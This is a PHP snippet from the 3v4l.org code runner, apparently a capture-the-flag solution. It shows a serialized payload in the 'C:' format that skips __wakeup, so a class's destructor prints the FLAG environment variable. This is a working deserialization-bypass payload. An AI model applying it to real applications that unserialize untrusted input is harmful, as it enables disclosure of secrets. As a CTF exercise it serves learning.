3v4l.org

run code in 300+ PHP versions simultaneously
<?php class Sekai_Game{ public $start = True; public function __destruct(){ echo "__destruct\n"; if($this->start === True){ echo "Sekai Game Start Here is your flag ".getenv('FLAG'); } } public function __wakeup(){ echo "__wakeup\n"; $this->start=False; } } $data='C:10:"Sekai_Game":0:{}'; unserialize($data); ?>

preferences:
24.63 ms | 405 KiB | 5 Q